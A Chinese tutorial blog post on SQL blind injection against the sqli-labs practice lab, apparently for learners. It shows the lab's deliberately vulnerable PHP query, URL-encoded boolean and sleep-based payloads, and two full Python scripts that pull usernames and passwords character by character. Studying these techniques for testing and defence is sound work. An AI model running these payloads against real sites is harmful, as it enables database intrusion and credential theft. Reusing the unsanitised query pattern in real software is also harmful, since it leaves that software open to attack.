对于SQL注入还不理解的朋友可以参看之前的文章《SQL注入基础》,本文章主要讲SQL盲注

0x00 盲注简介:

顾名思义,像盲人一样注入(什么鬼解释…),通俗来说,当我们发现有SQL注入时,确不能得到SQL查询的数据回显,除了之前的写文件方式,还有就是盲注了,盲注就是通过服务器返回的状态等各种因素来猜测,最终组合得到哦我们想要的数据。

0x01 盲注必须知识:

SQL盲注中常用的几个内置函数,了解一下~
length(str):返回str字符串的长度。substr(str, pos, len):将str从pos位置开始截取len长度的字符进行返回。注意这里的pos位置是从1开始的,不是数组的0开始mid(str,pos,len):跟上面的一样,截取字符串ascii(str):返回字符串str的最左面字符的ASCII代码值。asc();同上ord(str):同上,返回ascii码if(a,b,c) :a为条件,a为true,返回b,否则返回c,如if(1>2,1,0),返回0

0x02 基于网页特征的Bool盲注:

这里还是基于Sqli平台吧,这货花样多~先以最简单的 Less-8 这个单引号Bool盲注的题分析源码:
  1. <?php //和原文件有删减,为了更好的阅读效果 //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0); //不报错 if(isset($_GET['id'])) //如果有参数id传入 { $id=$_GET['id']; $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) //如果查到数据就执行如下 { echo '<font size="5" color="#FFFF00">'; echo 'You are in...........'; echo "<br>"; echo "</font>"; } else //否则执行这个 从两者返回的网页结构不一样,就可以作为我们盲注条件判断的依据 { echo '<font size="5" color="#FFFF00">'; echo "</br></font>"; echo '<font color= "#0000ff" font size= 3>'; } } else { echo "Please input the ID as parameter with numeric value";} ?>
根据服务器返回的不同网页结构来判断当前的SQL注入的关键词是否正确,一个有 You 单词,可根据这一特征。构造这样的语句,返回if(true)的网页
WAF丨SQL从盲注学习到EXP编写-V站
不满足,返回if(false)的网页
WAF丨SQL从盲注学习到EXP编写-V站
下面就写一个简单的脚本来具体解释:
  1. # name:SQL bind # author:DYBOY # time: 2018-07-01 # description: 用于SQL盲注学习脚本参考 import requests import re req = requests.Session() header = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"} #盲注测试字符 fuzz = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ' fuzz = list(fuzz) main_url = "http://www.test.com/Less-8/index.php?id=1" #注入参考语句:id=1%27+and+ascii(substr((select+username+from+users+limit+0,1),1,1))=97+%23 #注入参考语句2: id=1%27+and+ascii(substr((select+username+from+users+limit+0,1),1,1))=ascii("a")+%23 username = "username:" password = "password:" #得到usernmae for i in range(1,6): for key in fuzz: url = main_url + "%27+and+ascii(substr((select+username+from+users+limit+0,1),"+str(i)+",1))="+str(ord(key))+"+%23" html = req.get(url,headers = header,timeout=8) guize = r'You' if(re.findall(guize,html.text)): username = username + key print(username) #得到password for j in range(1,6): for key in fuzz: url = main_url + "%27+and+ascii(substr((select+password+from+users+limit+0,1),"+str(j)+",1))="+str(ord(key))+"+%23" html = req.get(url,headers = header,timeout=8) guize = r'You' if(re.findall(guize,html.text)): password = password + key print(password)
运行结果如下:
WAF丨SQL从盲注学习到EXP编写-V站
这个脚本就是基于网页特征来判定的,下面看看时间盲注的脚本怎么写!

0x03 延时注入:

当一个网页返回的数据根本没变化,报错也不管用,时间盲注就可以上线了!先看一个SQL语句:
if(ascii(substr((select+username+from+users+limit+0,1),1,1))=97,sleep(3),0)
这个SQL语句执行的效果就是,如果if语句成立那么就服务器延时 3s 后返回网页给客户端,否则正常时间返回网页。通过这样一个条件,我们就可以进行时间盲注了。时间盲注脚本如下:
  1. # name:SQL time bind injection # author:DYBOY # time: 2018-07-01 # description: 用于SQL时间盲注学习脚本参考 import requests import time req = requests.Session() header = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"} #盲注测试字符 fuzz = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ@_.<>?/;!$#{}-' fuzz = list(fuzz) main_url = "http://www.test.com/Less-8/index.php?id=1" #注入参考语句:id=1%27+and+if(ascii(substr((select+username+from+users+limit+0,1),1,1))=97,sleep(3),0)+%23 username = "username:" password = "password:" #得到username for i in range(1,6): for key in fuzz: start_time = time.time() url = main_url + "%27+and+if(ascii(substr((select+username+from+users+limit+0,1),"+str(i)+",1))="+str(ord(key))+",sleep(3),0)+%23" html = req.get(url,headers = header,timeout=8) if((time.time() - start_time)>=3): username = username + key print(username) #得到password for i in range(1,6): for key in fuzz: start_time = time.time() url = main_url + "%27+and+if(ascii(substr((select+password+from+users+limit+0,1),"+str(i)+",1))="+str(ord(key))+",sleep(3),0)+%23" html = req.get(url,headers = header,timeout=8) if((time.time() - start_time)>=3): password = password + key print(password)
运行结果:
WAF丨SQL从盲注学习到EXP编写-V站
没错,时间盲注就是将判断条件改成了时间,时间盲注往往有更广泛的用途~